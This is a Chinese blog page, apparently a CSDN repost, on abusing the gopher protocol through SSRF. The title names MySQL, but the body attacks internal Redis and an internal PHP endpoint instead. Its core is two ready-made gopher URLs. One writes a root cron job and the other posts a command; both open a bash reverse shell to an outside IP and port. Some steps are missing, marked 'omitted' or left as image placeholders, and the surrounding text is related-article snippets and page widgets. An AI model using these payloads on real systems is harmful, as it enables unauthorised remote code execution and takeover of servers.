gopher对mysql的利用_gopher协议的攻击利用

最新推荐文章于 2023-12-06 09:38:59 发布
最新推荐文章于 2023-12-06 09:38:59 发布
阅读量200 收藏
点赞数
文章标签: gopher对mysql的利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32873435/article/details/114500353
版权

攻击内网redis

攻击redis常见exp为:

ce3bd1db0a46

ce3bd1db0a46

对应的gopher协议为:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

ce3bd1db0a46

ce3bd1db0a46

攻击FastCGI 略

攻击内网Vulnerability Web

Gopher 可以模仿 POST 请求,故探测内网的时候不仅可以利用 GET 形式的 PoC(经典的 Struts2),还可以使用 POST 形式的 PoC。

一个只能 127.0.0.1 访问的 exp.php,内容为:

利用方式:

ce3bd1db0a46

构造gopher协议的url:

gopher://127.0.0.1:80/_POST /exp.php HTTP/1.1%0d%0aHost:127.0.0.1%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept:*/*%0d%0aContent-Length:49%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ae=bash -i >%2526/dev/tcp/172.19.23.228/23330>%25261null

ce3bd1db0a46

爱向日葵菇凉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql is fashion ctf_从一道CTF题目看Gopher攻击MySql
weixin_29032337的博客
01-20 197
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
gopher攻击mysql_gopher 协议在SSRF 中的一些利用
weixin_42131785的博客
02-05 1133
gopher 协议协议简介gopher 协议是一个在http 协议诞生前用来访问Internet 资源的协议可以理解为http 协议的前身或简化版,虽然很古老但现在很多库还支持gopher 协议而且gopher 协议功能很强大。它可以实现多个数据包整合发送,然后gopher 服务器将多个数据包捆绑着发送到客户端,这就是它的菜单响应。比如使用一条gopher 协议的curl 命令就能操作mysql ...
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 8061
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
gophermysql利用及例题讲解
最新发布
DKPT的博客
12-06 124
查询语句(url编码)+url编码的登入请求。
SSRF利用 Gopher |Gopher攻击mysql及内网
crispr的博客
06-23 5149
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议之SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
gopher攻击mysql_CTFweb类型(二十七)gophermysql利用及例题讲解
weixin_42462007的博客
02-05 293
本次来讲一下gopher协议MySQL中的利用,其实CTF题目中已经有出现过了,比如说红帽杯还有CTF都有出现过,不管是像之前讲的Redis还是MySQL,就是这种协议利用,都是有可以做转化,现在我们讲的只是一个demo,毕竟这些协议最终它的本质其实都是对MySQL,对Redis的一个使用,但是应用能够扩展成什么类型的题目,都可以在变。先讲一下对MySQL利用:我这边创建一个demo,简单了...
MySQL基础.pdf
10-15
该资源清晰的讲述MySQL数据库的安装,卸载,MySQL数据库图形化软件的安装,各大数据库语言的分类,MySQL的基础语法
基于Swing+jdbc+mysql的Java图书管理系统
08-03
基于Swing+jdbc+mysql的Java图书管理系统 下载后,可直接用Eclipse或者IEDA打开 内含: 1、BookManager图书管理系统源码(含jdbcUtils工具类和驱动) 2、ER图 3、SQL数据库表
golangMysql驱动.zip
01-07
- **兼容性**:Go-SQL-Driver支持多种MySQL协议版本,包括旧版MySQL服务器。 - **性能**:驱动设计为轻量级,减少了内存分配和不必要的数据复制,从而提高了性能。 - **安全性**:支持SSL连接,确保数据传输的...
easy-tips:使用Go&PHP的代码职业中的一些提示:partying_face::partying_face::partying_face:
02-02
《 PHPer,Gopher成长之路》 V1.10 「全原创系列」记录我在成为一名PHPer,Gopher的学习过程版权申明未经专有者明确授权,禁止发行本手册及其被修改的版本。未经专有者预先授权,禁止进行作品及其衍生作品以标准...
algernon:具有Lua,Markdown,HTTP2,QUIC,Redis和PostgreSQL支持的小型独立式纯Go Web服务器
02-03
内置支持QUIC,HTTP / 2,Lua,Markdown,Pongo2,HyperApp,Amber,Sass(SCSS),GCSS,JSX,BoltDB的Web服务器(内置,将数据库存储在文件中,例如SQLite), Redis,PostgreSQL,MariaDB / MySQL,速率限制,...
Golang操作sqlx库处理MySQL数据库
weixin_46529397的博客
02-02 334
sqlx操作
Nagini靶机之HTTP3协议、SSRF漏洞(Gopher + Mysql)、Joomla漏洞、SSH公钥登录、浏览器密码还原等利用方法
qq_40898302的博客
05-10 602
在snape用户下查看home路径,发现hermoine用户的主目录下有一个bin文件,bin文件下的su_cp文件拥有s权限,su_cp是copy的功能,并有hermoine所属权限。将abc生成一个md5值的密码,将joomla数据库中,joomla_users表中的site_admin的password字段的值更新为abc的MD5值。在hermoine的家目录存在.mozilla文件夹,他是存放浏览器的信息的文件夹下面存在firefox浏览器,通过工具去查看浏览器的账户密码。
php mysql盲注_[题目]记一次利用gopher的内网mysql盲注
weixin_42560991的博客
01-28 174
进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopher的ssrf,题目已经提示得很明显了,利用站外location跳转到gopher协议下进行内网操作, 然后还能读到一个sql文件个conn.php,并且数据库无密码.那么应该是操作数据库了, 但是这里有两个问题,1:不知道数据库的...
mysql 远程攻击_gopher 协议攻击内网 mysql
weixin_29480231的博客
01-19 272
本地测试一开始使用的是 centos 6.5 的虚拟机后来发现我的 curl 为 7.19.7 版本,不支持 gopher 协议但是都失败了..如果有 centos 6.5 升级 curl 版本成功的请告诉我!环境搭建失败了就只能慢慢的搭环境了,一时脑抽想体验一下 docker-compose,就去装了 dnmp(docker+nginx+mysql+php) 很棒的一个项目不过默认 php_cu...
gophermysql利用_从一道CTF题目看Gopher攻击MySql
weixin_32394247的博客
02-23 102
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0×00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
gopher攻击mysql_[WEB安全] SSRF 利用 Gopher 协议拓展攻击面【转载】
weixin_30268555的博客
02-23 157
0x01 概述Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。gopher协议支持发出 GET、POST 请求:可以先截获 get 请求包和 post 请求包,再构造成符合 gopher 协议的请求。 gopher ...
从一道CTF题目看Gopher攻击MySql(转载)
qwzf
07-18 940
转载自FreeBuf平台 作者:undef1ned 前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,解压后的目录不解析php。通过上传一个含有符号链接文件的压缩
gopher攻击mysql_机窝安全--安全技术 | 巧用Gopher协议扩展SSRF攻击手法
weixin_36001196的博客
02-23 656
SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,话不多说,看文章。0×01 环境搭建Centos 靶机Kali攻击机Lnmp [文中会介绍安装]Redis[文中会介绍安装]Gopherus.py [https://github.com/tarunkant/Gopherus]目标站点源码1 ...
Gopher协议使用总结1
08-03
1. 明尼苏达大学的吉祥物是地鼠 2. 一个跑腿的助手就像地鼠一样在地下挖洞总能到达它想要的位置 1. 如果第一个字符是 > 或者 < 那么丢弃该行字符串,表示

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值